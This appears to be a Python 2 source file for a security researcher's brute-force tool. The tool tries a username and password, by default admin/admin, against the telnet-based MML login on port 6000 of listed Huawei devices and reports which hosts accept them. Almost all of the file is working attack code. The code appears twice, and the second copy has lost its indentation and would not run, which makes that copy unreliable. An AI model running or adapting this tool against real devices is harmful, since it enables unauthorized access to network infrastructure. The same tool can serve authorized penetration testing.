staaldraad/mmlBrute.py

## mmlBrute.py
#!/usr/bin/python

"""
Brute-force tool to find the username/password for MML on a Huawei device.
Author: Etienne Stalmans (etienne@sensepost.com)
Version: 1.0 (14/01/2014)
"""

import sys
import telnetlib
import argparse
import os

targets = []

class processTargets(argparse.Action):
    def __call__(self, parser, namespace, values, option_string=None):
        setattr(namespace, self.dest, values)
        global targets
        if os.path.isfile(values):
            fin = open(values,'r')
            for l in fin:
                targets.append(l.strip())
            fin.close()
        elif ',' in values:
            targets = values.split(',')
        else:
            targets.append(values)

parser = argparse.ArgumentParser()
parser.add_argument('-t', '--targets',action=processTargets,required=True,
    help="a single target (0.0.0.0), a set of comma-separated targets. Or the filepath to a target list (one target per line)")
parser.add_argument('-tp', dest='port', action='store',default="6000",
    help="Set the target port.")
parser.add_argument('-u', dest='user', action='store',default="admin",
    help="Username to try")
parser.add_argument('-p', dest='password', action='store',default="admin",
    help="Password to try")
arg = parser.parse_args()

user = arg.__dict__['user']
password = arg.__dict__['password']
port = arg.__dict__['port']

for host in targets:
    tn = telnetlib.Telnet(host,port)
    tn.write('LGI:OP="%s",PWD="%s";\n'%(user,password))
    ret = tn.read_until("---    END")
    #print ret
    if "RETCODE = 0" in ret:
        print "\033[92m%s\033[0m -- Logged In! -- %s"%(host,password)
    else:
        print "\033[91m%s\033[0m -- Failed "%host

tn.close()
	#!/usr/bin/python

	"""
	Brute-force tool to find the username/password for MML on a Huawei device.
	Author: Etienne Stalmans (etienne@sensepost.com)
	Version: 1.0 (14/01/2014)
	"""

	import sys
	import telnetlib
	import argparse
	import os

	targets = []

	class processTargets(argparse.Action):
	def __call__(self, parser, namespace, values, option_string=None):
	setattr(namespace, self.dest, values)
	global targets
	if os.path.isfile(values):
	fin = open(values,'r')
	for l in fin:
	targets.append(l.strip())
	fin.close()
	elif ',' in values:
	targets = values.split(',')
	else:
	targets.append(values)

	parser = argparse.ArgumentParser()
	parser.add_argument('-t', '--targets',action=processTargets,required=True,
	help="a single target (0.0.0.0), a set of comma-separated targets. Or the filepath to a target list (one target per line)")
	parser.add_argument('-tp', dest='port', action='store',default="6000",
	help="Set the target port.")
	parser.add_argument('-u', dest='user', action='store',default="admin",
	help="Username to try")
	parser.add_argument('-p', dest='password', action='store',default="admin",
	help="Password to try")
	arg = parser.parse_args()

	user = arg.__dict__['user']
	password = arg.__dict__['password']
	port = arg.__dict__['port']

	for host in targets:
	tn = telnetlib.Telnet(host,port)
	tn.write('LGI:OP="%s",PWD="%s";\n'%(user,password))
	ret = tn.read_until("--- END")
	#print ret
	if "RETCODE = 0" in ret:
	print "\033[92m%s\033[0m -- Logged In! -- %s"%(host,password)
	else:
	print "\033[91m%s\033[0m -- Failed "%host

	tn.close()